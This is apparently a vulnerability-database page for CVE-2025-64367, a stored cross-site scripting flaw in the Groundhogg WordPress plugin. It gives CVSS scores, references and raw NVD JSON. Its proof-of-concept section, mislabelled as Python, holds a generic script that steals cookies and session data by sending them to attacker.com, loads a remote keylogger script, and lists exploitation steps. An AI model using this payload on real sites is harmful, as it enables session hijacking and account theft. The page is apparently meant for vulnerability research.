CVE-2025-64367

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adrian Tobey Groundhogg groundhogg allows Stored XSS.This issue affects Groundhogg: from n/a through <= 4.2.6.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Groundhogg <= 4.2.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-64367 Groundhogg Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in Groundhogg plugin -->

<!-- Attack Payload - Stored XSS -->
<script>
  // Steal admin cookies/session
  var cookies = document.cookie;
  fetch('https://attacker.com/steal?c=' + btoa(cookies), {
    method: 'POST',
    mode: 'no-cors'
  });
  
  // Alternative payload - DOM based XSS exfiltration
  var sessionData = {
    url: window.location.href,
    cookies: cookies,
    userAgent: navigator.userAgent,
    referrer: document.referrer
  };
  
  // Send stolen data to attacker controlled endpoint
  new Image().src = 'https://attacker.com/log?data=' + encodeURIComponent(JSON.stringify(sessionData));
</script>

<!-- XSS Payload with keylogger functionality -->
<script src='https://attacker.com/xss.js'></script>

<!-- Practical exploitation steps:
1. Identify Groundhogg plugin version <= 4.2.6
2. Find input fields that are not properly sanitized
3. Inject the XSS payload into the vulnerable field
4. Wait for admin or other privileged user to view the page
5. Execute malicious JavaScript in their browser context
-->

<!-- Mitigation: Update to Groundhogg > 4.2.6 and implement input validation -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64367
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64367
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64367/
[4] VulDB https://vuldb.com/cve/CVE-2025-64367
[5] https://patchstack.com/database/Wordpress/Plugin/groundhogg/vulnerability/wordpress-groundhogg-plugin-4-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64367", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:37.440", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adrian Tobey Groundhogg groundhogg allows Stored XSS.This issue affects Groundhogg: from n/a through <= 4.2.6."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en Adrian Tobey Groundhogg groundhogg permite XSS Almacenado. Este problema afecta a Groundhogg: desde n/a hasta menor igual que 4.2.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/groundhogg/vulnerability/wordpress-groundhogg-plugin-4-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}